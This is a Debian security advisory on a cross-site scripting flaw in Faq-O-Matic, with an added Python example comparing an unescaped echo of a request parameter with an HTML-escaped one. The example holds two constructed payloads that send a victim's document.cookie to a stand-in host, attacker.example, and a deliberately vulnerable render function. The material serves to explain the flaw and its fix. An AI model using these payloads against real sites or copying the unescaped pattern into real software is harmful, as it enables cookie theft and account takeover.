Debian Security Advisory
DSA-109-1 faqomatic -- cross-site scripting vulnerability
- Date Reported:
- 13 Feb 2002
- Affected Packages:
- faqomatic
- Security database references:
- In Mitre's CVE dictionary: CVE-2002-0230.
- More information:
Faq-O-Matic did not escape HTML in user-supplied input, so unverified script code was returned to the browser unchanged (a cross-site scripting flaw). With some tweaking, this enables an attacker to steal the cookies of a Faq-O-Matic moderator or of the admin.
This problem has been fixed in version 2.603-1.2 for the stable Debian distribution and version 2.712-2 for the current testing/unstable distribution.
We recommend that you upgrade your faqomatic package if you have it installed.
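The flaw above is a classic reflected cross-site scripting bug: a request parameter is copied into the generated page without escaping. The following is an added illustration, not Faq-O-Matic's own code (which is Perl CGI); the parameter name `q`, the page template and the cookie-stealing payload are all constructed for the example. It shows the vulnerable echo beside the fixed one, where every untrusted value is HTML-escaped in both text and attribute context before it is written to the page.

```python
"""Reflected XSS: unescaped echo of a request parameter vs. HTML-escaped echo.

Added example, not Faq-O-Matic's own code. The parameter name "q", the page
template and the payload are hypothetical/constructed.
"""
from html import escape
from urllib.parse import parse_qs, quote

# Constructed sample: the query string of a link an attacker might send to a
# moderator. The script ships document.cookie off to a host the attacker controls.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTACK_QS = "q=" + quote(PAYLOAD)

# Constructed sample for attribute context: closes the value attribute and adds
# an event handler without needing any <script> tag.
ATTR_PAYLOAD = '" onfocus="document.location=\'http://attacker.example/?c=\'+document.cookie'
ATTR_ATTACK_QS = "q=" + quote(ATTR_PAYLOAD)


def _param(query_string: str, name: str) -> str:
    """Return the first value of a query parameter, or '' if absent."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Before: the search term is interpolated verbatim into text and attribute
    context, which is the behaviour the advisory describes."""
    q = _param(query_string, "q")
    return (
        "<html><body>"
        f"<h1>Search results for {q}</h1>"
        f'<form><input name="q" value="{q}"></form>'
        "</body></html>"
    )


def render_fixed(query_string: str) -> str:
    """After: the value is HTML-escaped once, at output time. quote=True (the
    default) also escapes " and ', so the same escaped string is safe inside a
    quoted attribute as well as in element text."""
    q = escape(_param(query_string, "q"), quote=True)
    return (
        "<html><body>"
        f"<h1>Search results for {q}</h1>"
        f'<form><input name="q" value="{q}"></form>'
        "</body></html>"
    )


def has_live_script(html: str) -> bool:
    """Crude detector used for the comparison: is there a <script> element or
    an on* event-handler attribute that the browser would execute?"""
    lowered = html.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    for qs in (ATTACK_QS, ATTR_ATTACK_QS):
        print("vulnerable executes script:", has_live_script(render_vulnerable(qs)))
        print("fixed executes script:     ", has_live_script(render_fixed(qs)))
```

The essential point is that the escaping happens at the moment the value is written into HTML, not on the way in; stored values stay raw and every output path (text, attribute, and any other context the page has) must apply the correct encoding for that context.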
- Fixed in:
Debian GNU/Linux 2.2 (potato)
- Architecture-independent component:
MD5 checksums of the listed files are available in the original advisory.